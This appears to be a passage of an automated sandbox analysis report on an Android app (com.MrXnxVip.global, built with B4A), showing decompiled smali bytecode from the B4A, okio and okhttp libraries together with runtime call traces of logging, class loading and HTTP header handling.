                        306sput-object v9, Lanywheresoftware/b4a/keywords/LayoutBuilder;->chosen:Lanywheresoftware/b4a/keywords/LayoutValues;
                        308invoke-virtual {v9, v4}, Lanywheresoftware/b4a/keywords/LayoutValues;->calcDistance(Lanywheresoftware/b4a/keywords/LayoutValues;)F
                        309move-result v5
                        310move v7, v6
                        311goto/16 :goto_1a9
                        312cond_19d:
                        313invoke-virtual {v9, v4}, Lanywheresoftware/b4a/keywords/LayoutValues;->calcDistance(Lanywheresoftware/b4a/keywords/LayoutValues;)F
                        314move-result v10
                        315cmpg-float v15, v10, v5
                        316if-gez v15, :cond_1a9
                        317sput-object v9, Lanywheresoftware/b4a/keywords/LayoutBuilder;->chosen:Lanywheresoftware/b4a/keywords/LayoutValues;
                        318move v7, v6
                        319move v5, v10
                        320goto_1a9: add-int/lit8 v6, v6, 0x1
                        321goto/16 :goto_95
                        322cond_1ad: move-object/from16 v8, p3
                        323int-to-long v3, v3
                        325invoke-virtual {v13, v3, v4}, Ljava/io/DataInputStream;->skip(J)J
                        326move-result-wide v5
                        327try_end_1b4: sub-long/2addr v3, v5
                        328long-to-int v3, v3
                        329goto/16 :goto_55
                        330catchall_1b8: move-exception v0
                        331goto/16 :goto_1c3
                        332catch_1ba: move-exception v0
                        333try_start_1bb: new-instance v1, Ljava/lang/RuntimeException;
                        335invoke-direct {v1, v0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        336throw v1
                        337catch_1c1: move-exception v0
                        338throw v0
                        339goto_1c3: sput-object v11, Lanywheresoftware/b4a/keywords/LayoutBuilder;->tempBA:Lanywheresoftware/b4a/BA;
                        340sput-object v11, Lanywheresoftware/b4a/keywords/LayoutBuilder;->customViewWrappers:Ljava/util/List;
                        341goto/16 :goto_1c9
                        342goto_1c8: throw v0
                        343goto_1c9: goto/16 :goto_1c8
                        Cross References
                        APIs
                        • java.util.ArrayList.<init>
                        • java.lang.Integer.valueOf
                        • java.util.Collection.add
                        • java.util.Collection.toArray
                        • java.util.Arrays.copyOf
                        • java.lang.Integer.valueOf
                        • java.util.List.set
                        • java.util.List.get
                        • java.util.List.size
                        • java.util.List.get
                        • java.util.List.size
                        • java.util.List.get
                        • java.util.List.get
                        • java.lang.Number.intValue
                        • java.util.List.get
                        • java.lang.Number.intValue
                        • java.util.List.remove
                        • java.util.List.remove
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Object.toString
                        • java.lang.IllegalArgumentException.<init>
                        • java.util.Arrays.copyOf
                        • java.lang.Object.toString
                        • java.lang.IllegalArgumentException.<init>
                        • java.lang.NullPointerException.<init>
                        Strings
                        • byteStrings
                        • duplicate option:
                        • java.lang.String@a6e78f4
                        • java.lang.String@c1ba048
                        • java.util.Arrays.copyOf(this, size)
                        • the empty byte string is not a supported option
                        • null cannot be cast to non-null type kotlin.Array<T>
                        Position Instruction Meta Information
                        0.annotation runtime Lkotlin/jvm/JvmStatic;
                        1.end annotation
                        2move-object/from16 v0, p1
                        4const-string v1, "byteStrings"
                        6invoke-static {v0, v1}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        7array-length v1, v0
                        8const/4 v2, 0x1
                        9const/4 v3, 0x0
                        10if-nez v1, :cond_e
                        11const/4 v1, 0x1
                        12goto/16 :goto_f
                        13cond_e: const/4 v1, 0x0
                        14goto_f: const/4 v4, 0x0
                        15if-eqz v1, :cond_20
                        16new-instance v0, Lokio/Options;
                        17new-array v1, v3, [Lokio/ByteString;
                        18const/4 v2, 0x2
                        19new-array v2, v2, [I
                        20fill-array-data v2, :array_158
                        22invoke-direct {v0, v1, v2, v4}, Lokio/Options;-><init>([Lokio/ByteString;[ILkotlin/jvm/internal/DefaultConstructorMarker;)V
                        23return-object v0
                        24cond_20:
                        25invoke-static/range {p1 .. p1}, Lkotlin/collections/ArraysKt;->toMutableList([Ljava/lang/Object;)Ljava/util/List;
                        26move-result-object v1
                        28invoke-static {v1}, Lkotlin/collections/CollectionsKt;->sort(Ljava/util/List;)V
                        29new-instance v5, Ljava/util/ArrayList;
                        30array-length v6, v0
                        32invoke-direct {v5, v6}, Ljava/util/ArrayList;-><init>(I)V
                        33check-cast v5, Ljava/util/Collection;
                        34array-length v6, v0
                        35const/4 v7, 0x0
                        36goto_31: if-ge v7, v6, :cond_40
                        37aget-object v8, v0, v7
                        38const/4 v8, -0x1
                        40invoke-static {v8}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        41move-result-object v8
                        43invoke-interface {v5, v8}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        44add-int/lit8 v7, v7, 0x1
                        45goto/16 :goto_31
                        46cond_40: check-cast v5, Ljava/util/List;
                        47check-cast v5, Ljava/util/Collection;
                        48new-array v6, v3, [Ljava/lang/Integer;
                        50invoke-interface {v5, v6}, Ljava/util/Collection;->toArray([Ljava/lang/Object;)[Ljava/lang/Object;
                        51move-result-object v5
                        52if-eqz v5, :cond_14d
                        53check-cast v5, [Ljava/lang/Integer;
                        54array-length v6, v5
                        56invoke-static {v5, v6}, Ljava/util/Arrays;->copyOf([Ljava/lang/Object;I)[Ljava/lang/Object;
                        57move-result-object v5
                        58check-cast v5, [Ljava/lang/Integer;
                        60invoke-static {v5}, Lkotlin/collections/CollectionsKt;->mutableListOf([Ljava/lang/Object;)Ljava/util/List;
                        61move-result-object v13
                        62array-length v11, v0
                        63const/4 v12, 0x0
                        64const/4 v14, 0x0
                        65goto_5c: if-ge v12, v11, :cond_79
                        66aget-object v5, v0, v12
                        67add-int/lit8 v15, v14, 0x1
                        68move-object v6, v5
                        69check-cast v6, Ljava/lang/Comparable;
                        70const/4 v7, 0x0
                        71const/4 v8, 0x0
                        72const/4 v9, 0x6
                        73const/4 v10, 0x0
                        74move-object v5, v1
                        76invoke-static/range {v5 .. v10}, Lkotlin/collections/CollectionsKt;->binarySearch$default(Ljava/util/List;Ljava/lang/Comparable;IIILjava/lang/Object;)I
                        77move-result v5
                        79invoke-static {v14}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        80move-result-object v6
                        82invoke-interface {v13, v5, v6}, Ljava/util/List;->set(ILjava/lang/Object;)Ljava/lang/Object;
                        83add-int/lit8 v12, v12, 0x1
                        84move v14, v15
                        85goto/16 :goto_5c
                        86cond_79:
                        87invoke-interface {v1, v3}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        88move-result-object v5
                        89check-cast v5, Lokio/ByteString;
                        91invoke-virtual {v5}, Lokio/ByteString;->size()I
                        92move-result v5
                        93if-lez v5, :cond_87
                        94const/4 v5, 0x1
                        95goto/16 :goto_88
                        96cond_87: const/4 v5, 0x0
                        97goto_88: if-eqz v5, :cond_13f
                        98const/4 v5, 0x0
                        99goto_8b:
                        100invoke-interface {v1}, Ljava/util/List;->size()I
                        101move-result v6
                        102if-ge v5, v6, :cond_fb
                        104invoke-interface {v1, v5}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        105move-result-object v6
                        106check-cast v6, Lokio/ByteString;
                        107add-int/lit8 v7, v5, 0x1
                        108move v8, v7
                        109goto_9a:
                        110invoke-interface {v1}, Ljava/util/List;->size()I
                        111move-result v9
                        112if-ge v8, v9, :cond_f9
                        114invoke-interface {v1, v8}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        115move-result-object v9
                        116check-cast v9, Lokio/ByteString;
                        118invoke-virtual {v9, v6}, Lokio/ByteString;->startsWith(Lokio/ByteString;)Z
                        119move-result v10
                        120if-nez v10, :cond_ad
                        121goto/16 :goto_f9
                        122cond_ad:
                        123invoke-virtual {v9}, Lokio/ByteString;->size()I
                        124move-result v10
                        126invoke-virtual {v6}, Lokio/ByteString;->size()I
                        127move-result v11
                        128if-eq v10, v11, :cond_b9
                        129const/4 v10, 0x1
                        130goto/16 :goto_ba
                        131cond_b9: const/4 v10, 0x0
                        132goto_ba: if-eqz v10, :cond_dc
                        134invoke-interface {v13, v8}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        135move-result-object v9
                        136check-cast v9, Ljava/lang/Number;
                        138invoke-virtual {v9}, Ljava/lang/Number;->intValue()I
                        139move-result v9
                        141invoke-interface {v13, v5}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        142move-result-object v10
                        143check-cast v10, Ljava/lang/Number;
                        145invoke-virtual {v10}, Ljava/lang/Number;->intValue()I
                        146move-result v10
                        147if-le v9, v10, :cond_d9
                        149invoke-interface {v1, v8}, Ljava/util/List;->remove(I)Ljava/lang/Object;
                        151invoke-interface {v13, v8}, Ljava/util/List;->remove(I)Ljava/lang/Object;
                        152goto/16 :goto_9a
                        153cond_d9: add-int/lit8 v8, v8, 0x1
                        154goto/16 :goto_9a
                        155cond_dc: new-instance v0, Ljava/lang/StringBuilder;
                        157invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        159const-string v1, "duplicate option: "
                        161invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        163invoke-virtual {v0, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        165invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        166move-result-object v0
                        167new-instance v1, Ljava/lang/IllegalArgumentException;
                        169invoke-virtual {v0}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        170move-result-object v0
                        172invoke-direct {v1, v0}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        173check-cast v1, Ljava/lang/Throwable;
                        174throw v1
                        175cond_f9: move v5, v7
                        176goto/16 :goto_8b
                        177cond_fb: new-instance v2, Lokio/Buffer;
                        179invoke-direct {v2}, Lokio/Buffer;-><init>()V
                        180move-object/from16 v15, p0
                        181check-cast v15, Lokio/Options$Companion;
                        182const-wide/16 v6, 0x0
                        183const/4 v9, 0x0
                        184const/4 v11, 0x0
                        185const/4 v12, 0x0
                        186const/16 v14, 0x35
                        187const/16 v16, 0x0
                        188move-object v5, v15
                        189move-object v8, v2
                        190move-object v10, v1
                        191move-object v1, v15
                        192move-object/from16 v15, v16
                        194invoke-static/range {v5 .. v15}, Lokio/Options$Companion;->buildTrieRecursive$default(Lokio/Options$Companion;JLokio/Buffer;ILjava/util/List;IILjava/util/List;ILjava/lang/Object;)V
                        196invoke-direct {v1, v2}, Lokio/Options$Companion;->getIntCount(Lokio/Buffer;)J
                        197move-result-wide v5
                        198long-to-int v1, v5
                        199new-array v1, v1, [I
                        200goto_11d:
                        201invoke-virtual {v2}, Lokio/Buffer;->exhausted()Z
                        • Time: 690549
                          • This:
                            • java.lang.String@c1ba048
                          • p0: [C@2495ee1
                          • p0: 00000004ffffffff00000000000000ef000000fe000000fffffffff6fffffff0ffffffebffffffe7fffffffdffffffff00000000000000ff000000ff00000003
                          • Return:
                            • java.lang.String@c1ba048
                        • Time: 690555
                          • This:
                            • okio.ByteString@72c2406
                          • Return:
                            • java.lang.String@c1ba048
                        • Time: 690556
                          • This:
                            • okio.ByteString@3695ac7
                          • Return:
                            • ~e:newmessage1_service_start (java line: 28)
                        • Time: 690549
                          • This:
                            • [size=144 hex=00000004ffffffff00000000000000ef000000fe000000fffffffff6fffffff0ffffffebffffffe7fffffffdffffffff00000000000000ff000000ff00000003]
                          • Return:
                            • false
                        • Time: 690646
                          • This:
                            • [size=144 hex=00000004ffffffff00000000000000ef000000fe000000fffffffff6fffffff0ffffffebffffffe7fffffffdffffffff00000000000000ff000000ff00000003]
                          • Return:
                            • true
                        202move-result v5
                        203if-nez v5, :cond_12d
                        204add-int/lit8 v5, v3, 0x1
                        206invoke-virtual {v2}, Lokio/Buffer;->readInt()I
                        207move-result v6
                        208aput v6, v1, v3
                        209move v3, v5
                        210goto/16 :goto_11d
                        211cond_12d: new-instance v2, Lokio/Options;
                        212array-length v3, v0
                        214invoke-static {v0, v3}, Ljava/util/Arrays;->copyOf([Ljava/lang/Object;I)[Ljava/lang/Object;
                        215move-result-object v0
                        217const-string v3, "java.util.Arrays.copyOf(this, size)"
                        219invoke-static {v0, v3}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        220check-cast v0, [Lokio/ByteString;
                        222invoke-direct {v2, v0, v1, v4}, Lokio/Options;-><init>([Lokio/ByteString;[ILkotlin/jvm/internal/DefaultConstructorMarker;)V
                        223return-object v2
                        224cond_13f: new-instance v0, Ljava/lang/IllegalArgumentException;
                        226const-string v1, "the empty byte string is not a supported option"
                        228invoke-virtual {v1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        229move-result-object v1
                        231invoke-direct {v0, v1}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        232check-cast v0, Ljava/lang/Throwable;
                        233throw v0
                        234cond_14d: new-instance v0, Ljava/lang/NullPointerException;
                        236const-string v1, "null cannot be cast to non-null type kotlin.Array<T>"
                        238invoke-direct {v0, v1}, Ljava/lang/NullPointerException;-><init>(Ljava/lang/String;)V
                        239goto/16 :goto_156
                        240goto_155: throw v0
                        241goto_156: goto/16 :goto_155
                        242nop
                        Cross References
                        APIs
                        • android.util.Log.i
                        • java.lang.String.length
                        Strings
                        • null
                        • B4A
                        • Message longer than Log limit (4000). Message was truncated.
                        • WakeLock already held.
                        • sending message to waiting queue (CallSubDelayed - JobDone)
                        • ~e:The Starter service should never be started from a receiver.
                        • ~e:newmessage1_service_start (java line: 28)
                        • ~i:** Activity (main) Create (first time) **
                        • ~i:** Activity (main) Pause, UserClosed = false **
                        • ~i:** Activity (main) Resume **
                        • ~i:** Receiver (firebasemessaging) OnReceive **
                        • ~i:** Receiver (newmessage1) OnReceive **
                        • ~i:** Receiver (pnservices) OnReceive **
                        • ~i:** Receiver (starter) OnReceive **
                        • ~i:** Service (firebasemessaging) Start **
                        • ~i:** Service (newmessage1) Create **
                        • ~i:** Service (newmessage1) Start **
                        • ~i:** Service (pnservices) Start **
                        • ~i:** Service (starter) Start **
                        • ~i:*** Receiver (httputils2service) Receive ***
                        • ~i:*** Receiver (httputils2service) Receive (first time) ***
                        • ~i:*** Service (firebasemessaging) Create ***
                        • ~i:*** Service (newmessage1) Create ***
                        • ~i:*** Service (pnservices) Create ***
                        • ~i:*** Service (starter) Create ***
                        • ~i:Service started in foreground mode.
                        • ~l161245210:NoToken
                        • ~l16196611:create
                        Position Instruction Meta Information
                        0if-nez p0, :cond_4
                        2const-string p0, "null"
                        3cond_4:
                        4const-string v0, "B4A"
                        6invoke-static {v0, p0}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I
                        8invoke-virtual {p0}, Ljava/lang/String;->length()I
                        9move-result v0
                        10const/16 v1, 0xfa0
                        11if-le v0, v1, :cond_16
                        13const-string v0, "Message longer than Log limit (4000). Message was truncated."
                        15invoke-static {v0}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        16cond_16:
                        17sget-object v0, Lanywheresoftware/b4a/BA;->bridgeLog:Lanywheresoftware/b4a/BA$IBridgeLog;
                        18if-eqz v0, :cond_1d
                        20invoke-interface {v0, p0}, Lanywheresoftware/b4a/BA$IBridgeLog;->offer(Ljava/lang/String;)V
                        • Time: 685941
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:*** Service (starter) Create ***
                        • Time: 686121
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:** Service (starter) Start **
                        • Time: 688202
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: icon-small
                        • Time: 689604
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:** Service (firebasemessaging) Start **
                        • Time: 690692
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:** Activity (main) Create (first time) **
                        • Time: 693352
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~l16196611:create
                        • Time: 695427
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:** Activity (main) Resume **
                        • Time: 696025
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:*** Service (newmessage1) Create ***
                        • Time: 696059
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:** Service (newmessage1) Start **
                        • Time: 696102
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:** Receiver (firebasemessaging) OnReceive **
                        • Time: 696218
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:** Activity (main) Pause, UserClosed = false **
                        • Time: 696938
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:*** Receiver (httputils2service) Receive (first time) ***
                        • Time: 697777
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:*** Receiver (httputils2service) Receive ***
                        • Time: 700223
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: sending message to waiting queue (CallSubDelayed - JobDone)
                        • Time: 702731
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:Service started in foreground mode.
                        • Time: 811947
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:** Receiver (starter) OnReceive **
                        • Time: 811957
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~e:The Starter service should never be started from a receiver.
                        • Time: 811993
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:** Receiver (newmessage1) OnReceive **
                        • Time: 812009
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:** Receiver (pnservices) OnReceive **
                        • Time: 812169
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger$1@f6e3282
                          • p0: ~i:*** Service (pnservices) Create ***
                        • 6 additional calls hidden ...
                        21cond_1d: return-void
                        Cross References
                        APIs
                        • java.lang.Object.toString
                        • java.lang.String.length
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.String.toLowerCase
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.Class.forName
                        • java.lang.Class.isAssignableFrom
                        • java.lang.Class.getName
                        • java.lang.Class.getName
                        • java.lang.String.lastIndexOf
                        • java.lang.String.substring
                        • java.lang.Class.getName
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        Strings
                        • .
                        • com.MrXnxVip.global.starter
                        • com.MrXnxVip.global.firebasemessaging
                        • com.MrXnxVip.global.pnservices
                        • $
                        • _BR
                        • com.MrXnxVip.global.firebasemessaging$firebasemessaging_BR
                        • com.MrXnxVip.global.pnservices$pnservices_BR
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Lanywheresoftware/b4a/BA;",
                        4"Ljava/lang/Object;",
                        5"Z)",
                        6"Ljava/lang/Class<",
                        7"*>;"
                        8}
                        9.end annotation
                        10.annotation system Ldalvik/annotation/Throws;
                        11value = {
                        12Ljava/lang/ClassNotFoundException;
                        13}
                        14.end annotation
                        15instance-of v0, p1, Ljava/lang/Class;
                        17const-string v1, "."
                        18const/4 v2, 0x0
                        19if-eqz v0, :cond_a
                        20check-cast p1, Ljava/lang/Class;
                        21goto/16 :goto_45
                        22cond_a: if-eqz p1, :cond_3f
                        24invoke-virtual {p1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        25move-result-object v0
                        27invoke-virtual {v0}, Ljava/lang/String;->length()I
                        28move-result v0
                        29if-nez v0, :cond_17
                        30goto/16 :goto_3f
                        31cond_17: instance-of p0, p1, Ljava/lang/String;
                        32if-eqz p0, :cond_3d
                        33new-instance p0, Ljava/lang/StringBuilder;
                        35sget-object v0, Lanywheresoftware/b4a/BA;->packageName:Ljava/lang/String;
                        37invoke-static {v0}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        38move-result-object v0
                        40invoke-direct {p0, v0}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        42invoke-virtual {p0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        43check-cast p1, Ljava/lang/String;
                        45sget-object v0, Lanywheresoftware/b4a/BA;->cul:Ljava/util/Locale;
                        47invoke-virtual {p1, v0}, Ljava/lang/String;->toLowerCase(Ljava/util/Locale;)Ljava/lang/String;
                        48move-result-object p1
                        50invoke-virtual {p0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        52invoke-virtual {p0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        53move-result-object p0
                        55invoke-static {p0}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 685670
                          • p0: com.MrXnxVip.global.starter
                          • Return:
                            • class com.MrXnxVip.global.starter
                            • getName: com.MrXnxVip.global.starter
                        56move-result-object p1
                        57goto/16 :goto_45
                        58cond_3d: move-object p1, v2
                        59goto/16 :goto_45
                        60cond_3f:
                        61iget-object p0, p0, Lanywheresoftware/b4a/BA;->className:Ljava/lang/String;
                        63invoke-static {p0}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 688233
                          • p0: plugged
                          • Return:
                            • class com.MrXnxVip.global.firebasemessaging
                            • getName: com.MrXnxVip.global.firebasemessaging
                        • Time: 812275
                          • p0: com.MrXnxVip.global.pnservices
                          • Return:
                            • class com.MrXnxVip.global.pnservices
                            • getName: com.MrXnxVip.global.pnservices
                        64move-result-object p1
                        65goto_45: if-nez p1, :cond_48
                        66return-object v2
                        67cond_48: if-eqz p2, :cond_86
                        68const-class p0, Landroid/content/BroadcastReceiver;
                        70invoke-virtual {p0, p1}, Ljava/lang/Class;->isAssignableFrom(Ljava/lang/Class;)Z
                        71move-result p0
                        72if-nez p0, :cond_86
                        74invoke-virtual {p1}, Ljava/lang/Class;->getName()Ljava/lang/String;
                        75move-result-object p0
                        77invoke-virtual {p1}, Ljava/lang/Class;->getName()Ljava/lang/String;
                        78move-result-object p2
                        80invoke-virtual {p2, v1}, Ljava/lang/String;->lastIndexOf(Ljava/lang/String;)I
                        81move-result p2
                        82add-int/lit8 p2, p2, 0x1
                        84invoke-virtual {p0, p2}, Ljava/lang/String;->substring(I)Ljava/lang/String;
                        85move-result-object p0
                        86new-instance p2, Ljava/lang/StringBuilder;
                        88invoke-virtual {p1}, Ljava/lang/Class;->getName()Ljava/lang/String;
                        89move-result-object p1
                        91invoke-static {p1}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        92move-result-object p1
                        94invoke-direct {p2, p1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        96const-string p1, "$"
                        98invoke-virtual {p2, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        100invoke-virtual {p2, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        102const-string p0, "_BR"
                        104invoke-virtual {p2, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        106invoke-virtual {p2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        107move-result-object p0
                        109invoke-static {p0}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 689617
                          • p0: com.MrXnxVip.global.firebasemessaging$firebasemessaging_BR
                          • Return:
                            • class com.MrXnxVip.global.firebasemessaging$firebasemessaging_BR
                            • getName: com.MrXnxVip.global.firebasemessaging$firebasemessaging_BR
                        • Time: 812212
                          • p0: com.MrXnxVip.global.pnservices$pnservices_BR
                          • Return:
                            • class com.MrXnxVip.global.pnservices$pnservices_BR
                            • getName: com.MrXnxVip.global.pnservices$pnservices_BR
                        110move-result-object p1
                        111cond_86: return-object p1
                        APIs
                        • java.lang.String.equals
                        • java.lang.String.equalsIgnoreCase
                        Strings
                        • %2e%2e
                        • %2e.
                        • %2e
                        • .%2e
                        • Accept-Encoding
                        • Accept-Ranges
                        • CF-Cache-Status
                        • CF-RAY
                        • Cache-Control
                        • Connection
                        • Content-Length
                        • Content-Type
                        • Date
                        • ETag
                        • Host
                        • Keep-Alive
                        • Last-Modified
                        • NEL
                        • Pragma
                        • Report-To
                        • Server
                        • Transfer-Encoding
                        • User-Agent
                        • Vary
                        • alt-svc
                        • chunked
                        • close
                        • http
                        • java.lang.String@b8d1c0f
                        Position Instruction Meta Information
                        0if-nez p0, :cond_8
                        1if-nez p1, :cond_6
                        2const/4 p0, 0x1
                        3goto/16 :goto_7
                        4cond_6: const/4 p0, 0x0
                        5goto_7: return p0
                        6cond_8: if-nez p2, :cond_f
                        8invoke-virtual {p0, p1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        9move-result p0
                        10goto/16 :goto_13
                        11cond_f:
                        12invoke-virtual {p0, p1}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
                        • Time: 690651
                          • This:
                            • lord
                          • p0: handleUncaughtException
                          • Return:
                            • false
                        • Time: 690652
                          • This:
                            • lord
                          • p0: %2e.
                          • Return:
                            • false
                        • Time: 690653
                          • This:
                            • lord
                          • p0: .%2e
                          • Return:
                            • false
                        • Time: 690654
                          • This:
                            • lord
                          • p0: com.MrXnxVip.global.starter
                          • Return:
                            • false
                        • Time: 697337
                          • This:
                            • java.lang.String@b8d1c0f
                          • p0: http
                          • Return:
                            • false
                        • Time: 697338
                          • This:
                            • java.lang.String@b8d1c0f
                          • p0: java.lang.String@b8d1c0f
                          • Return:
                            • true
                        • Time: 697377
                          • This:
                            • Connection
                          • p0: Host
                          • Return:
                            • false
                        • Time: 697392
                          • This:
                            • Accept-Encoding
                          • p0: Connection
                          • Return:
                            • false
                        • Time: 697460
                          • This:
                            • User-Agent
                          • p0: Accept-Encoding
                          • Return:
                            • false
                        • Time: 697474
                          • This:
                            • Host
                          • p0: Cache-Control
                          • Return:
                            • false
                        • Time: 697475
                          • This:
                            • Host
                          • p0: Pragma
                          • Return:
                            • false
                        • Time: 697773
                          • This:
                            • Content-Length
                          • p0: Content-Type
                          • Return:
                            • false
                        • Time: 697818
                          • This:
                            • Transfer-Encoding
                          • p0: Content-Length
                          • Return:
                            • false
                        • Time: 699325
                          • This:
                            • Expect
                          • p0: User-Agent
                          • Return:
                            • false
                        • Time: 699331
                          • This:
                            • 100-continue
                          • p0: null
                          • Return:
                            • false
                        • Time: 699935
                          • This:
                            • Content-Type
                          • p0: alt-svc
                          • Return:
                            • false
                        • Time: 699936
                          • This:
                            • Content-Type
                          • p0: CF-RAY
                          • Return:
                            • false
                        • Time: 699937
                          • This:
                            • Content-Type
                          • p0: Server
                          • Return:
                            • false
                        • Time: 699938
                          • This:
                            • Content-Type
                          • p0: NEL
                          • Return:
                            • false
                        • Time: 699939
                          • This:
                            • Content-Type
                          • p0: Report-To
                          • Return:
                            • false
                        • 14 additional calls hidden ...
                        13move-result p0
                        14goto_13: return p0
                        Cross References
                        APIs
                        • java.util.List.contains
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.net.UnknownServiceException.<init>
                        • okhttp3.internal.connection.RouteException.<init>
                        • java.net.UnknownServiceException.<init>
                        • okhttp3.internal.connection.RouteException.<init>
                        • okhttp3.Protocol.H2_PRIOR_KNOWLEDGE:Lokhttp3/Protocol
                        • java.util.List.contains
                        • java.net.ProtocolException.<init>
                        • okhttp3.internal.connection.RouteException.<init>
                        • java.lang.System.nanoTime
                        • okhttp3.internal.connection.RouteException.<init>
                        • okhttp3.internal.connection.RouteException.addConnectException
                        • java.net.UnknownServiceException.<init>
                        • okhttp3.internal.connection.RouteException.<init>
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        Strings
                        • call
                        • eventListener
                        • CLEARTEXT communication to
                        • not permitted by network security policy
                        • CLEARTEXT communication not enabled for client
                        • Too many tunnel connections attempted: 21
                        • H2_PRIOR_KNOWLEDGE cannot be used with HTTPS
                        • already connected
                        Position Instruction Meta Information
                        0move-object/from16 v7, p0
                        1move-object/from16 v8, p6
                        2move-object/from16 v9, p7
                        4const-string v0, "call"
                        6invoke-static {v8, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        8const-string v0, "eventListener"
                        10invoke-static {v9, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        12iget-object v0, v7, Lokhttp3/internal/connection/RealConnection;->protocol:Lokhttp3/Protocol;
                        13const/4 v10, 0x1
                        14if-nez v0, :cond_17
                        15const/4 v0, 0x1
